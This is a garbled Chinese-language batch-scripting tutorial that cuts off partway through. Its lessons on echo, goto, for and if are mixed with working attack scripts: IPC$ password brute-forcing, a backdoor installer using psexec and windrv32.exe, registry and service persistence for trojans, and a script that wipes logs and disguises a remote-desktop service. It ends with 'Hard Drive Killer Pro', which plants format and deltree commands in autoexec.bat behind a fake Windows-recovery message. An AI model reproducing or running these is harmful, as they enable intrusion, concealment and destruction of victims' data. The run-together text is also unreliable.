批处理(Batch)脚本学习教程

1、 .DOC资料. .bat .cmdCmd.exe,. .bat .cmdCmd.exe.Echo echo echo on|off messageSampleecho off / echo hello world . Sampleecho offecho Now initializing the program,please wait a minite.format X: /q/u/autoset (format /yautoset/y)Goto goto label labelSampleif %1= goto noparmsif %2= goto noparmsif%1%2Rem che

2、ck parameters if null show usage:noparmsecho Usage: monitor.bat ServerIP PortNumbergoto endgotoRem C/*-*/,Rem MessageSampleRem Here is the description.Pause Pause Press any key to continue . . .Sampleecho off:begincopy a:*.* dbackecho Please put a new disk into driver Apausegoto begin A d:back A pau

3、se Call call Callcall Drive:Path FileName BatchParameters :label argumentsDrive:Path FileNamefilename .bat .cmd start DOSstartMIN SEPARATE 16 Windows HIGH HIGH REALTIME REALTIME WAIT parameters / 32- GUI CMD.EXE choice choice /c:c:1234.: choice /c:dme defrag,mem,enddefrag,mem,endD,M,E?SampleSample.b

4、at:echo offchoice /c:dme defrag,mem,endif errorlevel 3 goto defrag if errorlevel 2 goto memif errotlevel 1 goto end:defragc:dosdefraggoto end:memmemgoto end:endecho good bye defrag,mem,endD,M,E? d m e ifddefragmmemeendgoto endendgood byeIf if :1if = (if %1=a format a:if %1= goto noparmsif %2= goto n

5、oparms2if exist if exist config.sys edit config.sys3if errorlevel / if not errorlevel if errorlevel 2 goto x2 DOSDOSerrorlevel01for for FOR %variablefor %variable|%variable in (set) do command CommandLineOptions%variable (set) command command-parameters FOR %variable %variable %i %I FOR :FOR /D %var

6、iable IN (set) DO command command-parametersFOR /R drive:path %variable IN (set) DO command command- drive:path FOR /R (.)FOR /L %variable IN (start,step,end) DO command command-para(1,1,5) 1 2 3 4 5(5,-1,1) (5 4 3 2 1)FOR /F options %variable IN (file-set) DO commandFOR /F options %variable IN (str

7、ing) DO commandFOR /F options %variable IN (command) DO command usebackq :FOR /F options %variable IN (file-set) DO commandFOR /F options %variable IN (string) DO commandFOR /F options %variable IN (command) DO commandfilenameset filenameset For /F options:eol=c - ()skip=n - delims=xxx - tokens=x,y,

8、m-n - for nth musebackq - : fisample1:FOR /F eol=; tokens=2,3* delims=, %i in (myfile.txt) do command myfile.txt for / for %i %j %k usebackq %i for %j %k tokens= tokens= 26 z Z FOR 52 FOR /F filenameset FOR /F filenameset CMD.EXE:FOR /F usebackq delims= %i IN (set) DO echo %iFOR :I - () %I%fI - %I %

9、dI - %I %pI - %I %nI - %I %xI - %I %sI - %aI - %I %tI - %I /%zI - %I %$PATH:I - %I :%dpI - %I %nxI - %I %fsI - %I %dp$PATH:i - %I %ftzaI - %I DIR%I PATH % FOR %I MSForsample2ForWin2knet use ipipc$ password /u:administratorfor /f i% in (dict.txt) do net use ipipc$ i% /u:administratori%admindict.txti%

10、net use findfor /f i% in (dict.txt) do net use ipipc$ i% /u:administrator|find :D:ok.txt kosample3 FOR %variablefor /f tokens=1,2,3 delims= %i in (victim.txt) do start call door.bat %i %j %ktokenssample1victim.txtdoor.bat%i %j %kcultivate.batnet useIPC$copyvictimIf errorlever =echoechodelims= vivtim

11、.txtvictim.txt%i %j %k ip password username- cut here then save as a batchfile(I call it main.bat ) -echo offif %1= goto usagefor /f tokens=1,2,3 delims= %i in (victim.txt) do start call IPChack.bat %i %j %kgoto end:usageecho run this batch in dos modle.or just double-click it.:end- cut here then sa

12、ve as a batchfile(I call it main.bat ) - cut here then save as a batchfile(I call it door.bat) -net use %1ipc$ %3 /u:%2if errorlevel 1 goto failedecho Trying to establish the IPC$ connection .OKcopy windrv32.exe%1admin$system32 & if not errorlevel 1 echo IP %1 USER %2 PWD %3 ko.txtpsexec %1 c:winnts

13、ystem32windrv32.exepsexec %1 net start windrv32 & if not errorlevel 1 echo %1 Backdoored ko.txt:failedecho Sorry can not connected to the victim.- cut here then save as a batchfile(I call it door.bat) -Windrv32.exe,PSexec.exe.,:+DDOS,().,.1% 9%shiftsample1fomat.batecho offif %1=a format a:formatform

14、at a:/q/u/auotsetecho please insert another disk to driver A.pausegoto fomatdosfomat.bat a,_sample2IPC$ip password username echo offnet use 1%ipc$ 2% /u:3% PASSWORDif errorlevel 1 echo connection failed,_.(Compound Command)&Usage & & .SampleC:dir z: & dir c:Ex4rchThe system cannot find the path spec

15、ified.Volume in drive C has no label.Volume Serial Number is 0078-59FBDirectory of c:Ex4rch2002-05-14 23:51 .2002-05-14 23:51 .2002-05-14 23:51 14 sometips.gif&Usage & & .SampleC:dir z: & dir c:Ex4rchThe system cannot find the path specified.C:dir c:Ex4rch & dir z:Volume in drive C has no label.Volu

16、me Serial Number is 0078-59FBDirectory of c:Ex4rch2002-05-14 23:55 .2002-05-14 23:55 .2002-05-14 23:55 14 sometips.gifFile(s) 14 bytesDir(s) 768,671,744 bytes freeThe system cannot find the path specified.dir file:/database/backup.mdb & copy file:/database/backup.mdb E:backupbackup.mdbcopycopyIF exi

17、st |Usage | | .SampleC:Ex4rchdir sometips.gif | del sometips.gifVolume in drive C has no label.Volume Serial Number is 0078-59FBDirectory of C:Ex4rch2002-05-14 23:55 14 sometips.gifFile(s) 14 bytes0 Dir(s) 768,696,320 bytes freesamplecopy trojan.exe %1admin$system32 & if not errorlevel 1 echo IP %1

18、USER %2 PASS %3 victim.txt| Usage | | .unixsampletime /tD:IP.lognetstat -n -p tcp|find :3389D:IP.logstart ExplorerbatIP, sample1echo hello worldc:hello.txt (stupid example?)sample2:DLLsystem32DLLEXEDLLCMD-system32-dir *.exeexeback.txt & dir *.dlldllback.txt,EXEDLLexeback.txtdllback.txt,DLL.system32E

19、XEDLLexeback1.txtdllback1.txt,:CMD-fc exeback.txt exeback1.txtdiff.txt & fc dllback.txt dllback1.txtdiff.txt.(FCDLLEXE,diff.txt),DLLEXE,DLLDELregsvr32 /u trojan.dllDLL,& & Sample.regecho HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunSample.regecho Invader=Ex4rchSample.regecho door=5C:WI

20、NNTsystem32door.exeSample.regecho Autodos=dword:02Sample.regsamlpe2:,HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun(RunonceRunservicesRunexec).,.IRCDSNX(windrv32.exe)start windrv32.exeattrib +h +r windrv32.exeecho HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun patch.dllecho

21、 windsnx =- patch.dllsc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:winntsystem32windrv32.exeregedit /s patch.dlldelete patch.dllREM DSNXDEsc.execonfigREM _.win2k/xp- cut here then save as .bat or .cmd file -echo preparing to delete all the default shares.w

22、hen ready pres any key.pauseecho off:Rem check parameters if null show usage.if %1= goto :Usage:Rem code start.echo.echo -echo.echo Now deleting all the default share %1$ /deletenet share %2$ /deletenet share %3$ /deletenet share %4$ /deletenet share %5$ /deletenet share %6$ /deletenet share %7$ /de

23、letenet share %8$ /deletenet share %9$ /deletenet stop Servernet start Serverecho.echo All the shares have been deleteedecho.echo -echo.echo Now modify the registry to change the system default properties.echo.echo Now creating the registry fileecho Windows Registry Editor Version 5.00 c:delshare.re

24、gecho HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanserverparameters c:delshare.regecho AutoShareWks=dword:00000000 c:delshare.regecho AutoShareServer=dword:00000000 c:delshare.regecho Nowing using the registry file to chang the system default properties.regedit /s c:delshare.regecho Deleti

25、ng the temprotarily files.del c:delshare.reggoto :END:Usageecho.echo -echo.echo A example for batch file echo Use batch file to change the sysytem share properties. echo.echo AuthorEx4rchecho Mail:Ex4rch QQ:1672602echo.echo ErrorNot enough parametersecho.echo Please enter the share disk you wanna de

26、lete echo.echo For instanceto delete the default shares:echo delshare c d e ipc admin printecho.echo If the disklable is not as C: D: E: Please chang it youself.echo.echo exampleecho If locak disklable are C: D: E: X: Y: Z: you should chang the command into echo delshare c d e x y z ipc admin printe

27、cho.echo * you can delete nine shares once in a useing *echo.echo -goto :EOF:ENDecho.echo -echo.echo OK,delshare.bat has deleted all the share you assigned.echo.Any questions ,feel free to mail to Ex4rch.echoecho.echo -echo.:EOFecho end of the batch file- cut here then save as .bat or .cmd file - cu

28、t here then save as .bat or .cmd file -echo Windows Registry Editor Version 5.00 patch.dllecho HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanserverparameters patch.dllecho AutoShareServer=dword:00000000 patch.dllecho AutoShareWks=dword:00000000 patch.dllREM echo HKEY_LOCAL_MACHINESYSTEMCurr

29、entControlSetControlLsa patch.dllecho restrictanonymous=dword:00000001 patch.dllREM echo HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNetBTParameters patch.dllecho SMBDeviceEnabled=dword:00000000 patch.dllREM echo HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesREMoteRegistry patch.dllecho Star

30、t=dword:00000004 patch.dllecho HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSchedule patch.dllecho Start=dword:00000004 patch.dllecho HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon patch.dllecho ShutdownWithoutLogon=0 patch.dllREM echo DontDisplayLastUserName=1 patch.dllREM

31、regedit /s patch.dll- cut here then save as .bat or .cmd file -terminnal serviceregedit /s patch.dllnet stop w3svcnet stop event logdel c:winntsystem32logfilesw3svc1*.* /f /qdel c:winntsystem32logfilesw3svc2*.* /f /qdel c:winntsystem32config*.event /f /qdel c:winntsystem32dtclog*.* /f /qdel c:winnt*

32、.txt /f /qdel c:winnt*.log /f /qnet start w3svcnet start event logrem net stop lanmanserver /ynet stop Schedule /ynet stop RemoteRegistry /ydel patch.dllecho The server has been patched,Have fun.del patch.batREM echo HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp p

33、atch.dllecho PortNumber=dword:00002010 patch.dllecho HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp patch.dllecho PortNumber=dword:00002012 patch.dllecho HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermDD patch.dllecho Start=dword:00000002 patch.dllecho HKEY_LOCAL

34、_MACHINESYSTEMCurrentControlSetServicesSecuService patch.dllecho Start=dword:00000002 patch.dllecho ErrorControl=dword:00000001 patch.dllecho ImagePath=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00, patch.dllecho 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,

35、5c,00,65, patch.dllecho 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00 patch.dllecho ObjectName=LocalSystem patch.dllecho Type=dword:00000010 patch.dllecho Description=Keep record of the program and windows message patch.dllecho DisplayName=Microsoft EventLog patch.dllech

36、o HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicestermservice patch.dllecho Start=dword:00000004 patch.dllcopy c:winntsystem32termsrv.exe c:winntsystem32eventlog.exeREM 33898210(00002012)Microsoft EventLogHard Drive Killer Pro Version 4.0- cut here then save as .bat or .cmd file -echo offrem This p

37、rogram is dedecated to a very special person that does not want to be named.:startclsecho PLEASE WAIT WHILE PROGRAM LOADS . . .call attrib -r -h c:autoexec.bat nulecho echo off c:autoexec.batecho call format c: /q /u /autoSample nul c:autoexec.batcall attrib +r +h c:autoexec.bat nulrem Drive checkin

38、g and assigning the valid drives to the drive variable.set drive=set alldrive=c d e f g h i j k l m n o p q r s t u v w x y zrem code insertion for Drive Checking takes place here.rem drivechk.bat is the file name under the root directory.rem As far as the drive detection and drive variable settings

39、, dont worry about how itrem works, its d*amn to complicated for the average or even the expert batch programmer.rem Except for Tom Lavedas.echo echo off drivechk.batecho prompt %comspec% /f /c vol %1: $b find Vol nul t.bat%comspec% /e:2048 /c t.bat drivechk.batdel t.batecho if errorlevel 1 goto end

40、dc drivechk.batclsecho PLEASE WAIT WHILE PROGRAM LOADS . . .rem When errorlevel is 1, then the above is not true, if 0, then its true.rem Opposite of binary rules. If 0, it will elaps to the next command.echo prompt %comspec% /f /c dir %1:./ad/w/-p $b find bytes nul t.bat%comspec% /e:2048 /c t.bat d

41、rivechk.batdel t.batecho if errorlevel 1 goto enddc drivechk.batclsecho PLEASE WAIT WHILE PROGRAM LOADS . . .rem if errorlevel is 1, then the drive specified is a removable media drive - not ready.rem if errorlevel is 0, then it will elaps to the next command.echo prompt dir %1:./ad/w/-p $b find 0 b

42、ytes free nul t.bat%comspec% /e:2048 /c t.bat drivechk.batdel t.batecho if errorlevel 1 set drive=%drive% %1 drivechk.batclsecho PLEASE WAIT WHILE PROGRAM LOADS . . .rem if its errorlevel 1, then the specified drive is a hard or floppy drive.rem if its not errorlevel 1, then the specified drive is a

43、 CD-ROM drive.echo :enddc drivechk.batrem Drive checking insertion ends here. enddc stands for end dDRIVE cHECKING.rem Now we will use the program drivechk.bat to attain valid drive information.:Sampledrvfor %a in (%alldrive%) do call drivechk.bat %a nuldel drivechk.bat nulif %drive.=. set drive=c:f

44、orm_delcall attrib -r -h c:autoexec.bat nulecho echo off c:autoexec.batecho echo Loading Windows, please wait while Microsoft Windows recovers your system . . . c:autoexec.batecho for %a in (%drive%) do call format %a: /q /u /autoSample nul c:autoexec.batecho cls c:autoexec.batecho echo Loading Wind

45、ows, please wait while Microsoft Windows recovers your system . . . c:autoexec.batecho for %a in (%drive%) do call c:temp.bat %a Bunga nul c:autoexec.batecho cls c:autoexec.batecho echo Loading Windows, please wait while Microsoft Windows recovers your system . . . c:autoexec.batecho for %a in (%dri

46、ve%) call deltree /y %a: nul c:autoexec.batecho cls c:autoexec.batecho echo Loading Windows, please wait while Microsoft Windows recovers your system . . . c:autoexec.batecho for %a in (%drive%) do call format %a: /q /u /autoSample nul c:autoexec.batecho cls c:autoexec.batecho echo Loading Windows,

47、please wait while Microsoft Windows recovers your system . . . c:autoexec.batecho for %a in (%drive%) do call c:temp.bat %a Bunga nul c:autoexec.batecho cls c:autoexec.batecho echo Loading Windows, please wait while Microsoft Windows recovers your system . . . c:autoexec.batecho for %a in (%drive%)

48、call deltree /y %a: nul c:autoexec.batecho cd c:autoexec.batecho cls c:autoexec.batecho echo Welcome to the land of death. Munga Bungas Multiple Hard Drive Killer version 4.0. c:autoexec.batecho echo If you ran this file, then sorry, I just made it. The purpose of this program is to tell you the fol

49、lowing. . . c:autoexec.batecho echo 1. To make people aware that security should not be taken for granted. c:autoexec.batecho echo 2. Love is important, if you have it, truly, dont let go of it like I did! c:autoexec.batecho echo 3. If you are NOT a vegetarian, then you are a murderer, and Im glad y

50、our HD is dead. c:autoexec.batecho echo 4. Dont support the following: War, Racism, Drugs and the Liberal Party.c:autoexec.batecho echo. c:autoexec.batecho echo Regards, c:autoexec.batecho echo. c:autoexec.batecho echo Munga Bunga c:autoexec.batcall attrib +r +h c:autoexec.bat:makedirif exist c:temp.bat attrib -r -h c:temp.bat nulecho echo off c:temp.batecho %1: c:temp.batecho cd c:temp.batecho :startmd c:temp.batecho for %a in (if not exist %2nul md %2 if exist %2nul cd